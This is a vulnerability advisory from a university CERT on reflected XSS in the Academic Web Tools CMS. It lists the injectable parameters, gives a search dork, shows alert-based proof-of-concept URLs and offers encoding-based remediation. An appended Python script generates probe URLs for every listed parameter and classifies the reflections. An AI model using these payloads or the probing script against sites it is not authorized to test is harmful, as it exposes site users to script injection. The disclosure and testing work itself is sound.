============================================ IUT-CERT 
============================================



 Title: Academic Web Tools CMS Multiple XSS

 Vendor: www.yektaweb.com

 Vulnerable Version: 1.5.7 and priors

 Type: XSS

 Fix: N/A

 Dork: AWT YEKTA



============================================  nsec.ir 
============================================



Description:

------------------



        YEKTAWEB Academic Web Tools is a Persian Content Management System
(CMS) for managing university affairs such as conferences, journals, etc.

    The built-in input filter of this package does not prevent XSS attacks
through some parameters: their values are reflected into the page unencoded,
so a crafted value can break out of the surrounding markup and execute
attacker-supplied script in the browser of anyone who follows the link.







Vulnerabilities:

------------------



        1- Cross Site Scripting (XSS) in "/page.php" via the "sid", "logincase"
and "redirect" parameters.

        http://yoursite/page.php?sid=[XSS]

        http://yoursite/page.php?logincase=[XSS]

        http://yoursite/page.php?redirect=[XSS]

        

        2- Cross Site Scripting (XSS) in "/page_arch.php" via the "sid",
"logincase" and "redirect" parameters.

        http://yoursite/page_arch.php?sid=[XSS]

        http://yoursite/page_arch.php?logincase=[XSS]

        http://yoursite/page_arch.php?redirect=[XSS]





        3- Cross Site Scripting (XSS) in "/login.php" via the "sid", "logincase"
and "redirect" parameters.

        http://yoursite/login.php?sid=[XSS]

        http://yoursite/login.php?logincase=[XSS]

        http://yoursite/login.php?redirect=[XSS]



        4- Cross Site Scripting (XSS) in "/download.php" via the "sid",
"logincase" and "redirect" parameters.

        http://yoursite/download.php?sid=[XSS]

        http://yoursite/download.php?logincase=[XSS]

        http://yoursite/download.php?redirect=[XSS]





Exploit/PoC:

------------------





Example: each payload first closes an open JavaScript comment ("*/"), an open
HTML comment ("-->") and the enclosing <script> block, then injects its own
script. The marker 188017 in the alert makes the reflection easy to spot in the
response; a successful test shows the alert in the browser.

                
http://yoursite/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa

                
http://yoursite/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script>

                
http://yoursite/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script>





Solution:

------------------



                The input validation filter should be patched. Filtering
alone is fragile, however: the reliable fix is to encode every reflected value
for the context it is written into (HTML entity encoding inside markup, and a
JavaScript string encoding that also escapes "<" and ">" inside inline
scripts). No vendor fix was available at the time of writing (see "Fix: N/A"
above).
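The following script is an added example for this advisory and is neither the advisory's own PoC nor the vendor's code. It builds the probe URL for every script/parameter pair listed in the Vulnerabilities section using the PoC payload, classifies a response as raw reflection (live XSS), neutralized reflection or no reflection, and shows a hardened inline-script template beside a vulnerable one. The two HTML templates, the function names, and the sample values are constructed here so the check runs offline; they are assumptions about the page layout, not the CMS's real output or the vendor's patch.

```python
"""Reflection check for the AWT parameters listed in the advisory above.

Added example; not the advisory's PoC and not the vendor's code. The templates
below are constructed to mirror the context the PoC payload targets.
"""
import json
import sys
import urllib.parse
import urllib.request

# Scripts and parameters from the Vulnerabilities section.
SCRIPTS = ["page.php", "page_arch.php", "login.php", "download.php"]
PARAMS = ["sid", "logincase", "redirect"]

# Same marker as the advisory's PoC. "*/" closes a JavaScript comment, "-->"
# an HTML comment, and "</script>" the enclosing script block; what follows
# is the attacker's own script element.
MARKER = "188017"
PAYLOAD = "*/--></script><script>alert(%s)</script>" % MARKER
LIVE_SCRIPT = "<script>alert(%s)</script>" % MARKER


def probe_urls(base):
    """Return (script, param, url) for each injection point in the advisory."""
    base = base.rstrip("/")
    urls = []
    for script in SCRIPTS:
        for param in PARAMS:
            query = urllib.parse.urlencode({"slc_lang": "fa", param: "1" + PAYLOAD})
            urls.append((script, param, "%s/%s?%s" % (base, script, query)))
    return urls


def classify(body):
    """Classify how the payload came back in a response body.

    'raw'         : the injected <script> element is intact, so it executes
    'neutralized' : the marker is present but the element was broken up by
                    encoding, so it is inert
    'none'        : the marker is absent (parameter not reflected here)
    """
    if LIVE_SCRIPT in body:
        return "raw"
    if MARKER in body:
        return "neutralized"
    return "none"


def render_vulnerable(value):
    """Constructed (hypothetical) template matching the context the PoC
    payload targets: the parameter lands inside a JS comment in an inline
    script with no encoding at all."""
    return ("<html><head><script><!--\n"
            "/* requested sid: %s */\n"
            "var sid = 1;\n"
            "//--></script></head><body>page</body></html>" % value)


def render_fixed(value):
    """Hardened form (an assumption about a correct fix, not the vendor's
    patch): emit the value as a JSON string literal with '<' and '>' escaped,
    so it can neither close the script block nor open a tag."""
    literal = json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")
    return ("<html><head><script>\n"
            "var sid = %s;\n"
            "</script></head><body>page</body></html>" % literal)


def probe(url, timeout=10):
    """Fetch one probe URL and classify it (needs network access)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return classify(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    if len(sys.argv) == 2:
        # Live mode: python awt_xss_check.py http://yoursite
        for script, param, url in probe_urls(sys.argv[1]):
            try:
                verdict = probe(url)
            except Exception as exc:  # network or HTTP error
                verdict = "error: %s" % exc
            print("%-14s %-10s %s" % (script, param, verdict))
    else:
        # Offline demonstration on the constructed templates.
        value = "1" + PAYLOAD
        print("vulnerable template:", classify(render_vulnerable(value)))
        print("hardened template:  ", classify(render_fixed(value)))
```

Run it with a base URL to test a real installation (only one you are authorized to test); without arguments it classifies the two constructed templates, which is enough to see why the hardened form works: once the value is a JSON string literal with angle brackets escaped, the `*/`, `-->` and `</script>` in the payload are just characters inside a string and cannot end the script block.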





Credit: 

------------------

Isfahan University of Technology - Computer Emergency Response Team

Thanks to: M. R. Faghani, N. Fathi, E. Aerabi, E. Jafari






